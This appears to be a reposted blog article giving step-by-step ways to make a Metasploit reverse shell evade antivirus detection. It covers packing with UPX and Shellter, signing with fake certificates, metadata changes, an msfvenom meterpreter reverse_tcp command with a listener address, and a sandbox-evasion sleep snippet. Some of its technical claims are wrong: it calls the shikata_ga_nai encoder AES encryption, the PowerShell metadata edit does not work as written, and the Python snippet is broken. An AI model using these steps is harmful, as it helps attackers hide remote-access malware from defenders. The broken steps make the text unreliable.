Reducing Reverse Shell Detection with Metadata and Packing Techniques

In this article, we explore how to reduce the detection rate of a Metasploit reverse shell from 58/72 to 33/72 on VirusTotal using techniques like custom packing, code signing, and metadata manipulation.

🔗 Reference: Medium

You Should Know: Practical Steps to Evade AV Detection

1. Custom Packing & Obfuscation

Packing the payload helps evade signature-based detection. Tools like UPX or custom packers can be used:

upx -9 payload.exe -o packed_payload.exe

For further obfuscation, use Shellter or Veil-Framework:

sudo apt install shellter 
shellter -a -f /path/to/payload.exe

2. Code Signing with Fake Certificates

Signing the binary reduces suspicion. Use osslsigncode or SigThief:

osslsigncode sign -certs certificate.pem -key private.key -in payload.exe -out signed_payload.exe

3. Metadata Manipulation

Changing file properties can trick AV engines:

 PowerShell: Modify file metadata 
(Get-Item "payload.exe").VersionInfo.FileDescription = "Legitimate Software"

4. Payload Encryption & Staged Loading

Use AES encryption with Metasploit:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o encrypted_payload.exe

5. Sandbox Evasion Techniques

Add sleep timers or environment checks:

import time 
if not "VMware" in os.environ.get("PROCESSOR_IDENTIFIER", ""): 
time.sleep(30)  Delay execution in non-VM environments 
execute_payload() 

What Undercode Say

Reducing AV detection requires a mix of obfuscation, encryption, and social engineering. While signature-based detection can be bypassed with packing and signing, modern EDR solutions may still catch behavioral anomalies. Always test payloads in isolated environments before deployment.

Expected Output:

A stealthier reverse shell with significantly lower detection rates, suitable for red team engagements.

🔗 Further Reading:

• Metasploit AV Evasion Guide
• VirusTotal Detection Bypass Techniques

Prediction

As AV and EDR solutions improve, attackers will increasingly rely on fileless attacks, in-memory execution, and AI-driven obfuscation to bypass defenses. Future malware may leverage legitimate software vulnerabilities rather than traditional payloads.

🔗 Related Research:

• MITRE ATT&CK: Defense Evasion
• The Evolution of Malware Detection

References:

Reported By: Andrew Mamdouh122 – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram